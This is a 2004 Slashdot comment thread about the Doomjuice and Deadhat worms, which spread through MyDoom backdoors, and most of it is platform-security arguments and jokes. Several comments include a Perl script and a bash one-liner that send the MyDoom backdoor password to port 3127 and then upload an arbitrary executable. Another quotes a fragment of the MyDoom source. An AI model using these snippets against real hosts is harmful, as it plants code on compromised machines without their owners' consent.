New Worms Feed on MyDoom Infections

JJP writes "ZDNet Australia is reporting that two new worms, Doomjuice and Deadhat, are taking over computers previously infected by the MyDoom virus. Apparently they try to uninstall the MyDoom virus and then take over the PC to start their own malignant work. Whilst the threat these two worms pose shouldn't be too big, both needing a MyDoom backdoor, it is still a novel way to spread a virus. In the Netherlands there is a newspaper reporting this proves MyDoom was initialy spread by organised crime in a dark plot to wage cyber-war and steal confidential data from our computers."

Get a Mac

[BWJones]

This reminds me of that old ad which opens with a guy was trying to hook up his laptop at a huge meeting to start a presentation. He is having problems getting things to work and people are yelling suggestions from the audience: "Try c: start!" or something like that. This goes on for some time with different people yelling various suggestions and then at the very end when it appears things are not going to work, someone yells: "get a Mac!" The ad then fades out.... I suppose for the Linux crowd, the yell could be "get a Penguin" or "get a boxen", but the sentiment is the same: Do something.....Do anything......but do not continue to use that unsecured Windows box. You are wasting your time and you are wasting my time and costing companies, businesses and governments big time.

Re:Get a Mac

[IthnkImParanoid]

Funny you suggest either buying a whole new machine, or using a whole different OS, when the MyDoom problem could just be solved by not opening attachments.

I'll just ask: is it possible for a binary file to open ports and send itself as an email attachment on a Mac? On a linux box? Are you sure you understand the problem?

Re:Get a Mac

[Matey-O]

Bullshit. There's NO reason why a windows box can't be just as stable and secure as any alternative. None (and I mean ZERO) machines on our network were affected by any of the mydoom variants.

Sane creation of a network topology, email subsystem, proactive network monitoring, and general patch management is NECESSARY to operate a large internet connected environment, reguardless of the Operating System of Choice.

(and to head off the usual Mac'noids, show me a mac based application that scans, OCRs, and backs up to multiple Optical drives 20,000 documents an hour.)

Re:Get a Mac

[Joe+the+Lesser]

As soon as Macintosh takes over the market(if ever), viruses will target them instead.

They're not more secure, but why hit 1/3 of the world's computers when you can hit 1/2 of them with a windows bug.

When the first Mac worm hits, it will be huge, because their users aren't used to dealing with them.

Re:Get a Mac

[nickg78]

So, are you implying there is such a thing as a secure Windows box?

Re:Get a Mac

or "get a boxen"

Please use this term correctly or, even, better, don't use this horribly overplayed geekism at all.

Re:Get a Mac

[ealar+dlanvuli]

We are talking about end users, and yeah Windows security is abysmal.

Re:Get a Mac

[Frymaster]

could just be solved by not opening attachments.

anything else i should avoid doing? i think you amply illustrate the point that the virusmania has reduced the usability of windows.

with my linux box and mac i can do whatever i want - including open attachments... i bought a computer so i could use it.

is it possible for a binary file to open ports and send itself as an email attachment on a Mac?

do you mean, "can i telnet 25 to another host"? well, yes. i hope that was a rhetorical question.

if you mean, "can i fire up an mta and start spraying email all over creation"? then the answer is only if you have root. and if that virus has root... well, you've got bigger problems.

Re:Get a Mac

Again, parroted on slashdot numerous times -- why hit the less than 1/3 IIS installations out there when you can hit 2/3 with an Apache bug?

popularity isn't exactly directly related to the number of exploits it has. :)

Re:Get a Mac

(and to head off the usual Mac'noids, show me a mac based application that scans, OCRs, and backs up to multiple Optical drives 20,000 documents an hour.)

There's NO reason why a Mac box can't do the exact same thing as any alternative. Sane creation of network topology, data backup subsystem, and general intelligence is NECESSARY to operate a large backup operation, regardless of the Operating System of Choice.

Re:Get a Mac

[Dionysus]

with my linux box and mac i can do whatever i want - including open attachments... i bought a computer so i could use it.

To be infected by MyDoom, you would have to open the attachment and run the binary.

if you mean, "can i fire up an mta and start spraying email all over creation"? then the answer is only if you have root. and if that virus has root... well, you've got bigger problems.

Eh, no. You don't have to be root to "spray email all over creation". Outgoing connections usually use unprivileged ports. And to accept incoming connection without root, you just need to listen to a port above 1024.

Re:Get a Mac

[sPaKr]

Why exactly do I need to be root to send mail? All i need to do is open a connection to some mta on port 25. That does not require root privilages. Do you need to be root to run elm, mutt, pine, evolution, insert mua here? No you may need root to do other evil things like insert the worm into the boot process, or hide from the process list. But in reality these thing are over rated, if your someone who excutes attachments are you going to pay attention to the running proccesses? And if you never reboot your *ix box does the process really need to be started on boot? There are many problems with windows, LookOut and other programs, Mydoom didnt take advantage of these, it used the most obundent resource available on computers, stupid users.

Re:Get a Mac

[Some+Dumbass...]

Sane creation of a network topology, email subsystem, proactive network monitoring, and general patch management is NECESSARY to operate a large internet connected environment, reguardless of the Operating System of Choice.

You realize, of course, that the average computer user wouldn't even _understand_ this sentence, much less be able (or willing?) to implement your suggestions.

You may be right in theory, but for unskilled (read: average, normal) users in the real world, Macs are currently the safe choice. There are just fewer exploited vulnerabilities in Mac OS X than in Windows XP. So for now, "Get a Mac" isn't such bad advice, if only for practical reasons.

Re:Get a Mac

[IthnkImParanoid]

My point is that the Windows' inherent insecurity is not the cause of MyDooom and, more specifically, the latest worms mentioned in the submission.

Yes, the question was rhetorical, and the point is an app can start accepting connections on a given port (which is how the latest worms are spreading) no matter what your OS. It's possible to firewall everything and require admin access to open ports on Linux and OSX, but hey, it's possible on Windows too. Bad sysadmins and clueless users are a problem on every platform.

Re:Get a Mac

[Frymaster]

Why exactly do I need to be root to send mail? All i need to do is open a connection to some mta on port 25.

sigh. i offered two options - open a connection on 25, which i referred to as "telnet 25" because i am old, for which root is not required, and start up the mta (postfix on panther) for which you do need to be root.

Re:Get a Mac

[noisehole]

from doomjuice:

Creates the file Sync-src-1.00.tbz (28,569 bytes) and copies this file to the %Windir%, %System%, %Temp%, and %UserProfile% folders, as well as to the root folder of all the fixed and remote drives. This file is a tar archive, which contains the source code of W32.Mydoom.A@mm

there're chances that this lil' cutie of oss will get "ported", since everyone got the source already ;)

Re:Get a Mac

[Moridineas]

Don't mean to be pedantic--but you wouldn't say "get a boxen" because boxen is plural.

etymologically it's an old way (well, old in English) of pluralizing that we only see in a few words...child children, brother brethren is similiar too. Interestingly enough, Persian being an Indo-European language has it too--Taleban (-an) is students (pl).

Re:Get a Mac

[Kenja]

MyDOom has its own SMTP server built into it. All it needs is access to outgoing ports. Thats it, nothing more. You would not need root access for it to work. You would just need to be dumb enough to download the attachment and run it. Just like people are doing on Windows.

Re:Get a Mac

[RancidBeef]

Well, that's true to a degree. I have several Windoze boxes (on VMWare virtual machines) that I'm responsible for. However, I've noticed that if I do a fresh install with the Win2K disk on a new VM the damn thing gets the Blaster worm (or even Code Red or Nimda) before I can even install the latest service pack. Yeah, I know I should disconnect it from the net until I get the SP installed, but that's a pain in the ass too because that means I have to keep a CD around with all the SPs. As I understand it, all service ports on a Mac are off by default. If Windows came this way, I wouldn't have to worry about this. Also, it's not a problem when installing Linux because I can choose to leave the services off before I ever boot it for the first time.

Re:Get a Mac

[kberg108]

Yeah and when/if everyone has a MAc then there will be a shit load of viruses for the MAC whooptie doo. The reason Windows is a target is because it is such a fucking giant one and it sure as hell doesn't help when the M$ folks don't do anything about it. But if you think for a second that everyone switching OSes will stop virus writers you are sorley mistaken.

Re:Get a Mac

[dgatwood]

On Mac OS X, installing a startup item requires you to manually type in your administrator password. Viruses could only become a permanent part of your system if they could convincing people that there was a reason to allow them to install things. Otherwise, such a virus could only run until you rebooted your computer or logged out, making it much less effective.

A virus would not be able to automatically start just by reading a message, as Mail doesn't allow that to happen. More significantly, it could not masquerade as another type of file, since clicking on it would pop up a dialog that says something like "Warning: the attachment 'foo.jpg.app' is an application. Since applications can contain viruses, make sure this was sent by someone you trust." or some such.

In short, even if the Mac platform were the primary computing platform on the planet, it would not have these problems at the same level, IMNSHO.

Re:Get a Mac

People aren't downloading and running an executable. They are double-clicking on an attachment or whatever. Then, since windows is all about being integrated and since most user run as "root" in Windows, it's allowed to get set up as a daemon and install itself to be loaded whenever a machine boots. In my opinion, it's the general design of the Windows operating system that is at fault. Loading an attachment (zip file was the big one at my place of work) shouldn't install a damn virus.

Re:Get a Mac

[dickiedoodles]

Again, parroted on slashdot numerous times -- why hit the less than 1/3 IIS installations out there when you can hit 2/3 with an Apache bug? popularity isn't exactly directly related to the number of exploits it has. :)

That's a different situation firstly Macs have much smaller percentage market share then IIS (about 3% according to goggle Zeitgeist). Secondly Microsoft is viewed as "The Evil Empire"(TM) so people are more likely to go after one of their products. Thirdly Mydoom basically relies on user idiocy, the people who open attachments when they have been told the risks are not likely to get magically smarter just by using a Mac. Fourthly Mydoom as well as most other virus/worms need as many infected machines as possible to propagate (and in the case of DDOS attacks release the payload) so the more machines that can be effected the better from a virus writers point of view

I'm not saying other OSes aren't more secure just that no OS is bullet proof and it seems to me windows gets more virus not only due to its problems but also due to it's successes.

Re:Get a Mac

[PIBM]

double clicking on the real .zip didn't executed the content of it .. it only started up winzip that asked what I wanted to do with it. People that then double-click on that file will get burned ..

Re:Get a Mac

[amyhughes]

When the first Mac worm hits, it will be huge, because their users aren't used to dealing with them.

When the first Mac worm hits it will die quickly because there will be so few Macs represented in people's address books.

Amy

Re:Get a Mac

[generationxyu]

it possible for a binary file to open ports and send itself as an email attachment on a Mac? On a linux box?

There's two major problems with writing virii for OS X, or Linux.

1. You're not covering a substantial part of the "market." You're not going to get your point across if 400 Mac users get infected with a virus. Same with Linux. Also, the average Linux user is not going to download and run an executable that someone sends them.
2. It's harder for it to do anything substantial. Yes, it would be able to replicate itself via email. But most likely, it would be running with the priveleges of the user running them. Most Win2k/XP users run as administrator. Even if they don't, it's a lot easier to get administrator on a Windows box than on a Linux/OS X box.

Re:Get a Mac

[generationxyu]

Find a bug in Apache that isn't patched within a day. Go ahead. I dare you.

Re:Get a Mac

[dustman]

Find a bug in Apache that isn't patched within a day. Go ahead. I dare you.

Guarantee me that if I look I won't find an apache server which is months or years out of date. Go ahead. I dare you.

Re:Get a Mac

[jnicholson]

Adding 'n' to a word to get the plural is a Dutch (and probably other languages) formation, borrowed for those few words in English because we English can never bear to see a word or technique used in a language without trying it out.

Re:Get a Mac

[mr3038]

Then, since windows is all about being integrated and since most user run as "root" in Windows, it's allowed to get set up as a daemon and install itself to be loaded whenever a machine boots.

And this is different from *x systems, that allow the worm to append their "service" to .bashrc or .Xclients, exactly how? [Remember, that windows users usually run as Administrator because they are the only user of the system. A normal user logging into a linux system is logically the same thing as windows user powering up the system and logging as administrator.]

If you want to take effective measurements against stupid users, simply install all software to /usr and setup users' home directories to /home. Then apply the magic and mount /usr as exec and read only, and mount the /home as write and noexec. Yep, the user is still able to run shell scripts but he has to execute the virus with style "sh virus.sh". On the other hand, he might also run "rm -rf ~" if virus mail asked to do so... There're fool proof systems, but I guess idiot proof systems do not exist.

Re:Get a Mac

[Moridineas]

Actually the "an/en" suffix is much much older than Dutch, or German, or Indo-Germanic languages -- like I said, it's a very old Indo-European language feature. And since English isn't purely Indo-Germanic, or Romance, or anything, it has features from multiple families.

Re:Get a Mac

[BiggyP]

so, on linux, i'd download the attachment, run it through unzip, make the binary executable, then run it? not bloody likely, -1 for usability maybe, but definately +3 for safety around newbies.

of course i'm sure on KDE with some WINE integration it could be so much quicker and easier...

Re:Get a Mac

[dbirchall]

Three words: "Insecure by default." Windows is. Linux and MacOS X aren't.

There have been reports of people setting up brand spankin' new computers during some of the worse recent infestations of the Internet, and getting infected basically as soon as they touched the network, before they ever even had a chance to download the patches.

I know, I know, now you're going to say that a good sysadmin (as if a good sysadmin would even touch Windows ;) or clueful user (ditto) would simply wait a day, or a week, or whatever, for the worms to cease, before setting up the computer.

Right. Hey, it's only lost productivity, no biggie!

Re:Get a Mac

[aauu]

To quote my less technically literate neighbor "What's email if you can't click on things!" His son routinely rebuilds his computer which is on a cable modem. No amount of O/S security will overcome user stupidity. This man is not ignorant of viruses. Just that viruses these days are little more subtle than the old format c: variety. I will bet that every one of the computers infected with mydork are also running every spyware and adware program in existence. This is why people need to upgrade, their old computer just grinds to a halt with self-inflicted infections.

Re:Get a Mac

[bill_mcgonigle]

I'll just ask: is it possible for a binary file to open ports and send itself as an email attachment on a Mac? On a linux box?

No, it's not possible - the x bit isn't set on an e-mail attachment so it can't be run. It would have to be chmodded +x before running.

Windows's problem is that anything named .exe,.com,.bat,.scr,.pif, etc. is run as a program when opened. That's part of Windows's design and can't be "fixed".

Re:Get a Mac

[TKinias]

scripsit Moridineas:

Actually the "an/en" suffix is much much older than Dutch, or German, or Indo-Germanic languages -- like I said, it's a very old Indo-European language feature. And since English isn't purely Indo-Germanic, or Romance, or anything, it has features from multiple families.

Getting even further OT ;) ... It's not too different from the Semitic masculine plurals -- `-in' in Arabic and `-im' in Hebrew.

Re:Get a Mac

"Viruses" are biological. "Virii" are technological.

"Cold/Flu Viruses"
"Computer Virii"

Simple, no?

p.s. STOP SHOUTING.

Re:Get a Mac

[tcp_len]

Again, parroted on slashdot numerous times -- why hit the less than 1/3 IIS installations out there when you can hit 2/3 with an Apache bug?

Becouse we hate M$!!!

Re:Get a Mac

yes the action of Loading an attachment shouldn't install a damn virus, the would prevent this in their system.


GAUGE

Re:Get a Mac

[ultranova]

Why does a post which contributes absolutely nothing to the conversation get modded informative as opposed to offtopic ?

Is there a Legion of English Teachers conspiring in Slashdot ?

Re:Get a Mac

[Brendan+Byrd]

Someday, some hacker will write a good Mac virus (or at least a virus that is compatible with Mac) just to shut you guys up! Oh, I will laugh my head off that day.

Sure, I use Linux, but I'm not arrogant enough to think that worms won't exist on Linux if Linux had 98% of the market share.

Re:Get a Mac

[da]

Remember, that windows users usually run as Administrator because they are the only user of the system. A normal user logging into a linux system is logically the same thing as windows user powering up the system and logging as administrator.

Err, where do you get this idea? A normal user logging on to a Linux system is just that - a normal user. Most people will use 'su' or 'sudo' to run tasks that require privileged access to the system (certainly that's what they should be doing. How many people always log into their *nix box as root?). Older versions of Windows required logging out and logging in as Administrator to achieve this, or giving (some) users membership of the Administrator group (common practice in many companies I've worked/consulted at). Newer versions have that "Run As" menu entry in Explorer, but I've come across several software packages that don't install properly if you use that option... So, tell me again how this is the same thing?

Re:Get a Mac

why the condescending sigh? Your suggestions didn't make an iota of sense. Don't be offended; it's not your fault that you're stupid.

Re:Get a Mac

[Moridineas]

Why does a post which contributes absolutely nothing to the conversation get modded informative as opposed to offtopic ?

Is there a Legion of English Teachers conspiring in Slashdot ?

Clearly there is NOT! If you had read my post you would know that english teachers would have no part of saying the word boxen! ;)

Look at it this way--boxen is a part of geek culture, and you'd be hard pressed to find another source of concentrated geek culture like slashdot.

Re:Get a Mac

No IT is not, and no YOU are not.

Re:Get a Mac

[gazbo]

That's part of Windows's design and can't be "fixed"

Holy fuck! Then it looks like my machine must have gained sentience and is lying to me!

Re:Get a Mac

[mr3038]

[I wrote: A normal user logging into a linux system is logically the same thing as windows user powering up the system and logging as administrator.]

Err, where do you get this idea? A normal user logging on to a Linux system is just that - a normal user.

Yes, I'm familiar with the difference and I'm running SuperiorSU on my Windows 2000 installation to overcome some difficulties of not running as Administrator all the time. However, Notice that I said logically. In linux, if the only user of the system is you (as in Windows and single Administrator account) then all that really matters to you can be destroyed with your user account. All your important files? Gone, because if you had write access to those, so did the worm that run on your account. The only major difference is that the worm doesn't spread to the whole system (and even that's true ONLY IF no local exploits do exist in your system) but in case of single user home desktop, what's the difference, after all?

Re:Get a Mac

[The+Evil+Couch]

yeah, I agree. The problem's in the users, not the software.

Pretty much every Windows-based email client I've seen warns about launching executables, because they may contain viruses.

Any user that's stupid enough to launch an executable, from someone they don't know, that they weren't expecting, that the program warns them up front that it may be a virus is going to get infected, no matter what OS they use.

Re:Get a PENCIL AND PAPER

[Denver_80203]

I hear those are safe too.. and just as useful to me in my busniess as a Mac.

Proofs?

[petabyte]

Hmm, it "proofs" eh? Maybe we could get it installed on slashdot to proof all stories as they're posted. :)

Re:Proofs?

[petabyte]

Ah well, they fixed it. Carry on :).

Originally it was:
"In the Netherlands there is a newspaper reporting this proofs MyDoom was initialy spread by organised crime in a dark plot to wage cyber-war and steal confidential data from our computers."

Re:Proofs?

Whilst the thread these two worms pose shouldn't be to big, both needing a MyDoom backdoor, it still is a novel way to spread a virus

Yes, that would be nice...

Re:Proofs?

The sentence still doesn't make sense :-)

Re:Proofs?

And how would you say it in Dutch? Who is the retard?

Deadhat

Is that the new BSD release?

Ooo!

[HarveyBirdman]

Maybe Red Hat or Apple paid for the *virus*. :-)

Re:Ooo!

[UFNinja]

No, if it was funded by Apple it would be called iDoom. ;)

Re:Ooo!

[cetan]

...and you'd have Mac users paying $99 for the upgrade to iDoom 0.0.1

Re:Ooo!

[addaon]

iAgree.

Re:Ooo!

[commodoresloat]

yeah but the upgrade will come in 5 different colors and be half the size of the original version of iDoom. And don't forget, Apple will continue to support users of the original iDoom virus.

Proof?

[Srividya]

No proof yet... BBC says MyDoom spread by Linux users to hurt SCO, Linux users say MyDoom spread by spammers to hurt everyone, spammers say MyDoom spread by BIGGER PENIS NOW... Who to believe?

Re:Proof?

[0mni]

Who does BIGGER PENIS NOW blame? I bet they blame Microsoft, "They just wanted to get in the news."

Re:Proof?

[Landaras]

You mispelled 'B1GG3R P3NI5 N0W!!!1111'

- Neil Wehneman

It proves one thing. . .

[UFNinja]

this proofs MyDoom was initialy spread by organised crime. . .

I think it "proofs" that the editors don't proofread the submissions. :-P

Re:It proves one thing. . .

...worms pose shouldn't be too big...

they did a great job with this one

AIM

[nycsubway]

I wonder if those random IMs I got in AIM are related to MyDoom. I got a couple random messages about capturing Osama Bin Laden from people i have talked to in ages. Seems like some sort of virus. Anyone else have that happen?

Re:AIM

[ParadoxicalPostulate]

Funny I was just looking that up for a friend.

This is not MyDoom.

This link may help.

Check that out, may help.

Re:AIM

[iLL_L0gic]

http://www.wired.com/news/infostructure/0,1377,622 51,00.html?tw=wn_tophead_7 Has nothing to do with it. What it has to do with is idiot people clicking "Yes" on the installation of an ActiveX control that installs spyware on their system. I'd say that's still the easiest way to get a virus installed on a windows box, end users always click yes. :)

Re:AIM

[phillymjs]

No, that's different scumware.

~Philly

Re:AIM

mod parent -1 off topic. this is a know bug in AIM and has nothing to do with mydoom or any other virus.

Re:AIM

[LostCluster]

It appears to be unrelated spyware, kidnapping any active AIM client and sending out assorted "Check out this site..." links, which then prey on the fact that most people say "Yes" to the "Do you want this ActiveX control? Somebody signed it." box.

Possibly it was inspired by MyDoom's reminder of how easy it is for a virus to wear just a little bit of sheep's clothing and get a user to give it the okay to execute.

Re:AIM

http://www.wired.com/news/infostructure/0,1377,622 51,00.html?tw=wn_tophead_7
Check this out, sounds like what you're seeing...

Re:AIM

[Construct403]

not to be redundant, Check out
http://www.securityfocus.com/archive/75/35336 8

Re:AIM

[firew0lfz]

yea, I got the same thing from a friend around tuesday night..

don't know if the following virus I got was related to the AIM thing about Osama, but at the time I wasn't running AV software, and I did notice that I had been the victim of some worm that apparantly was using my computer for a DoS attack (netstat was returning some SYN_SENT from me to some random address every second or so)...

the story ends with me updating my virus definitions (been awhile since I had) and cleaned it out. I'm running a win2k machine, so don't know if the same might've happened to you... anyone else scan their system and get anything similar?

Re:AIM

"from people i have talked to in ages."

Ages eh? So you are one of those people whose conversations never end? To the extreme that the people leave and send you email to try to interrupt you?

Ok..

[hookedup]

Here's an idea..

Next time, if you're going to post a link that you have to register for, at least make sure it's in english.

In other news...

[FortKnox]

In other news, by looking at the same day's news from the Netherlands, you'll see they just released "Deus Ex" and "Deus Ex: Invisible War." Conspiracy Theories have quadrupled since.

Thread?

[$-chavito-$]

I hate it when those sneaky Windows worms pose as threads, it makes em that much harder to catch.

Just Once

[4of12]

dark plot to wage cyber-war and steal confidential data from our computers."

...I wish that this sinister plot was met with terabytes/second of "confidential data" like, oh, free viagra offers, Nigerian 419 scams, Add 3 inches, etc...

DoomNet...

[LostCluster]

MyDoom's backdoor has been demonstrated by DoomJuice and now the copycats are at it. There's now network of zombies willing to do the bidding of anybody who hacks in... remember, the MyDoom name is based on a typo, the author wanted to call it MyDomain.

I guess the only positive side effect is that some of these DoomJuice variants are closing the back door from the original MyDoom so that nobody else can interfere with them. Now, if only there was a MyDoom uninstaller worm that didn't have another distructive payload...

Re:DoomNet...

[Weird+O'Puns]

Actually, according to many sources Deadhat/Vesser came before DoomJuice. So technically DoomJuice is the copycat. There's also a new variant of Welchia that makes use of MyDoom backdoor and then tries to remove it.

Re:DoomNet...

[That's+Unpossible!]

remember, the MyDoom name is based on a typo, the author wanted to call it MyDomain

Almost right. MyDomain was apparantly a variable in the code (uhh, then I am guessing VB code?) and he spelled it MyDoomain.

Re:DoomNet...

[httptech]

Vesser was discovered before Doomjuice, but if you look at the PE timestamp header, you see that Deadhat/Vesser was compiled on Tue Feb 4 06:23:59 2003, while Doomjuice was compiled on Tue Jan 27 06:22:58 2004. While the PE timestamp field can be easily edited, these dates are probably accurate in my opinion. So, Doomjuice can't be considered a copycat of Vesser.

My writeup of Doomjuice: http://www.lurhq.com/mydoom-c.html

Re:DoomNet...

[L0stm4n]

here do it yourself. lameness filter prevents perl code

heh...not sure if it works but if the c code does so should this.

Re:DoomNet...

[mroch]

According to Symantec's site, they have developed a tool to remove this Welchia worm. It appears that it's not about securing PCs and is all about selling more copies of Norton and protecting the bottom line...

Re:DoomNet...

[httptech]

Now, if only there was a MyDoom uninstaller worm that didn't have another distructive payload...

There is now- it's called DoomHunter.A.

Re:DoomNet...

[gnu-generation-one]

"Now, if only there was a MyDoom uninstaller worm that didn't have another distructive payload..."

No need to make it a worm. Just send it yourself to any IP address which sends a virus email to your domain.

Re:DoomNet...

[L0stm4n]

#!/usr/bin/perl -w
use IO::Socket;
use strict;

if(@ARGV < 3) {
print "****** Usage: $0 \<ip\> \<port\> \<program to upload\> ****\n";
exit -1;
}

my ( $host, $port, $exe ) = ($ARGV[0], $ARGV[1], $ARGV[2]);
my $doompass = "\x85\x13\x3c\x9e\xa2";

my $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) or die "cannot open socket: $!";

print $socket $doompass;

open(INPUT, $exe) || die "Can't open: $!";
while (<INPUT>){
print $socket $_;
}
close(INPUT) || die "Can't close: $!";

Re:DoomNet...

[tranZent]

on FreeBSD (and probably Linux)

#!/bin/bash

echo -e -n "\x85\x13\x3c\x9e\xa2"|cat - payload.exe|socket -wq 1.2.3.4 3127

Re:DoomNet...

[wwest4]

Since you seem to be in the know... how common are these variants in the wild? I've had a snort filter listening on the mydoom 'sploit ports the last day and a half and I haven't seen any mydoom/deadhat/vesser scans at all.

Re:DoomNet...

[httptech]

In the past two days, my honeypot listening on port 3127 has captured 56 copies of Doomjuice.A, 10 copies of Doomjuice.B and 1 copy of Mitglieder. It's really not a lot if you think about how big the Mydoom.A outbreak appeared to be. Here's an extra credit math problem - take those numbers and the time it takes to scan a subnet and get a rough estimate of infected machines. Each Doomjuice-infected system starts 64 threads, each one picks a class C at random and attempts to connect to hosts 1-254 in sequence (the 127.x.x.x class A subnet is the only one skipped)

Is "DeadHat" a reference to ....

[Kehl]

... the now defunct "RedHat" Linux distro?

Way to go on damming Linux users reputation :/

Virus names

Do you think people come up with a clever virus name or the virus first?

Re:Virus names

[DougWhite]

Isn't kinda like forming a Rock Band, you pick the name, and the image. The music comes to you after you sell your soul to the RIAA?

Re:Virus names

[Erick+the+Red]

The anti-virus companies come up with the names, often making fun of the virus writers in the process. MyDoom was named for a variable misspelling: MyDoomain (suppose to be MyDomain).

Re:Virus names

[eidechse]

The names are determined by virus researchers, not the virus writers. In fact, if during analysis it's apparent that the writer wanted a certain name used that name is intentionally avoided.

Re:Virus names

[DR+SoB]

Before virus companies took over, people would normally come up with a name first, because their virus had an intended target. For example the virus "Silence of the Lambs" was apparently targetted at a certain high school VP named Mrs. Lamb. Of course that was just a rumour :P

Re:Virus names

[T-Ranger]

Its more like $RECORD_LABEL chooses a image, genre, 'catch', and name. And then chooses from available bodies to fill the slots of band members.

Spice Girls is a good example of this... almost. The girls all responded to the same ad looking for singers, and they met in the lobby/waiting room of $EVIL_RECORD_LABEL. Then they collectivly took the idea and went somewhere else.

Other compleatly 'invented' bands (some self-invented from already famous musicians): Asia, The Byrds, The Monkeys, BTO... and basicly any boy band there ever was.

Re:Virus names

The anti-virus companies come up with the names, often making fun of the virus writers in the process. MyDoom was named for a variable misspelling: MyDoomain (suppose to be MyDomain).

How do you know this? The only references to "+mydoom +mydoomain" on Google is one-liners on a couple of small Spanish and German sites.

Running 'strings' on the binary does not reveal the word "mydoomain" anywhere, and the virus companies did not have access to the source back when they named it.

So I'm curious: if what you claim is true, where is the evidence?

Re:Virus names

[Erick+the+Red]

My post:
The anti-virus companies come up with the names, often making fun of the virus writers in the process. MyDoom was named for a variable misspelling: MyDoomain (suppose to be MyDomain).

The second sentence was just a repeat of what I had heard earlier on Slashdot. After a bit of looking around, I found that, as you pointed out, it has no factual basis. In fact, I found this quote:

Mydoom was named by Craig Schmugar, an employee of computer security firm McAfee and one of the earliest discoverers of the worm. Schmugar chose the name after noticing the text "mydom" within a line of the program's code. He noted: "It was evident early on that this would be very big. I thought having 'doom' in the name would be appropriate."

So while myDoom was named after a string in the virus, it was named after a different one that I posted, and for a different reason.

The point of my post was to say that anti-virus companies name the viruses, and avoid names that would give prestige to the virus writer.

Sorry for the mis-information.

Either that, or...

[dnahelix]

this proofs [sic] MyDoom was initialy spread by organised crime

Either that, or a bunch of smart, bored kids in the Netherlands...

Re:Either that, or...

don't you mean a bunch of smart board kids?

Re:Organized crime?

[Trigun]

When are the nation states going to wake up and start an international war against spam?

When the spammers have oil.

Cyber war? Puleeeze

[saskboy]

"In the Netherlands there is a newspaper reporting this proves MyDoom was initialy spread by organised crime in a dark plot to wage cyber-war..."

If organized crime was looking to steal data, all they had to do is ask people. Hundreds of people hand over their eBay, PayPal, and credit card information every day to phisher emails claiming to be from a legit company. Making a worm to steal the information isn't even necessary when the user is already the weakest link after being socially engineered.

Posing "threads"

[AndroidCat]

Viruses that install backdoors aren't new. And scanning to look for the backdoors isn't new. MyDoom.A got big press, spread far, and now (especially since it's now open source :) there are going to be a lot of people taking advantage of it.

All the speculation about who did it or even why is still speculation. (If someone hated SCO so much, why stop after two weeks?)

Re:Posing "threads"

[LostCluster]

Not to mention, DoomJuice appears to have come from the original author, which saves the copycats a lot of time in figuring out how to exploit the new flaw.

In fact, it seems all these people need to do is change the payload of DoomJuice to fit their specific wishes. One letter is not going to be enough to keep all the DoomJuice.* variants straight.

Re:Posing "threads"

[noisehole]

whoever it was, /. readers don't seem loyal to her/him anymore... bastard

sync-src-1.00.tbz/sync-1.00/massmail.c

static const char *loyal_list[] = {
"berkeley", "unix", "math", "bsd", "mit.e", "gnu", "fsf.",
"ibm.com", "google", "kernel", "linux", "fido", "usenet",
"iana", "ietf", "rfc-ed", "sendmail", "arin.", "ripe.",
"isi.e", "isc.o", "secur", "acketst", "pgp",
"tanford.e", "utgers.ed", "mozilla", /* "sourceforge", "slashdot", */

NULL,
"\n\nbe_loyal:" /* for final .exe */
};

War?

[bad+enema]

"this proves MyDoom was initialy spread by organised crime in a dark plot to wage cyber-war and steal confidential data from our computers."

What do they want to wage war against me for?
I just want to read email!

Re:War?

What do they want to wage war against me for?
I just want to read email!

Because they hate freedom.

"only about 50,000 or 75,000 machines left"

[__past__]

Could please someone find their owners and make sure they never get to operate a computer connected to a public network again? They have clearly shown not to be qualified, and are a threat to others.

Re:"only about 50,000 or 75,000 machines left"

Could please someone find their owners and make sure they never get to operate a computer connected to a public network again?

I'll get started on that after lunch.

Funny you should mention that...

[OgdEnigmaX]

Yes. It, like MyDoom, seems to install backdoors and such.

Re:Worms are legal in America, no?

That's only legal because you have to click on an "I agree to these terms" box to play the game. The fact that you're also running a worm/adware is disclosed in the legal text, but waaaaay down where nobody ever looks. Legal? Yes. Ethical? Only to SCO.

The problem is that they idiot-proofed the net and then we were surprised when the idiots came.

Grammer check anybody?

[Spokehedz]

Sheesh... Proofs? Thread? Now I know the 'editors' don't really edit bupkis.

Oh, and just so I don't get a OT mod...

These types of viruses will never die/go away. we'll keep seeing virus after virus come out, and each one will be "the fastest spreading to date" until everyone runs Linux... And then it'll get worse. I mean, running windows updates every day is one thing, but compiling my own kernel after applying the daily patch just gets boring after a bit... I mean, even if I could write a script to automate the process, and do it at 2am every day...

And then they'd patch the patches, and hack the hacks, and bla bla bla. I have ignored just about every single 'new virus' alert out there because its just stupid. I don't get any of the viruses, because by the time you hear about them you've already gotten about 50-million in your box, and your ignoring them already. That, or your virus scanner that updates every day already has the update against it, so its pointless.

Oh, and I run OS2/Warp as well. so I guess I'm safe, eh?

I thought that Doomjuice was from the ...

[burgburgburg]

creator of the original MyDoom and was leaving a copy of the source of MyDoom on the hard disk. The thoughts were that: a) only the creator of the original would have the source to include as part of Doomjuice's payload and b) if "everyone" had a copy of the source on their hard disk, it would be difficult to prove that any one person was responsible for originally writing it (assuming their computer was found/confiscated/examined).

Re:I thought that Doomjuice was from the ...

[LostCluster]

The problem was, by releasing Doomjuice, that author has effectively released an open source program to exploit what I'm calling "DoomNet", the network formed by the PCs infected with MyDoom that haven't been cleaned up yet.

So, effectively we've got worm-writing for dummies now. No need to write new full-featured virus, nor even the need to know how to exploit an obscure security hole. Just take DoomJuice and add your own payload...

Re:I thought that Doomjuice was from the ...

[Dr+Caleb]

So the legal strategy "It wasn't me, it was a hacker/trojan/virus" when it comes to computer crime, really is a valid and beyond-a-reasonable doubt defense.

Cool. Hey look! Someone just put all this tentacle rape stuff in my /home directory!

Re:I thought that Doomjuice was from the ...

[LostCluster]

When there's 48 similar worms all doing similar things, it's a little hard to figure out which one came first, and which worm caused which damage. Confuse juries enough to create a reasonable doubt, and in the USA at least you're in the clear...

Re:I thought that Doomjuice was from the ...

[TKinias]

scripsit Dr Caleb:

Cool. Hey look! Someone just put all this tentacle rape stuff in my /home directory!

Um, dude, if you've got a /home directory, you don't have a MyDoom problem...

(And if you're proficient enough to be running Cygwin you probably don't click executable attachments.)

I wonder

[bigattichouse]

Not that I would condone the activity, but I'm surprised someone hasn't made an email virus that installs an OS on the machine. I would find this in incredible violation of ones choice, but I still won't be surprised when it happens.

Re:I wonder

[LostCluster]

I'm surprised someone hasn't made an email virus that installs an OS on the machine.

